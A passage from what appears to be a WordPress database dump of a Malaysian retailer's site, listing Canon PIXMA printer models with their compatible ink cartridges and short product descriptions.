Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-25 08:33:57','2019-09-25 00:33:57','',1449,'https://bintara.com.my/blog/2019/09/25/1449-revision-v1/',0,'revision','',0),(3289,1,'2019-09-24 15:29:44','2019-09-24 07:29:44','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing\nThe Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.\nAvailable in Black and Red.\nPrint, Scan, Copy\nISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour\nHi-speed USB 2.0, WiFi\nRecommended print volume: 80 - 400 pages\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing\nThis compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.\nPrint, Scan, Copy, Fax\nISO standard print speed (A4): 8.8ipm black / 4.4ipm colour\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct\nRecommended print volume: 50 - 200 pages\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><p>&lt;center&gt;[maxbutton id=\"11\" ]&lt;/center&gt;</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 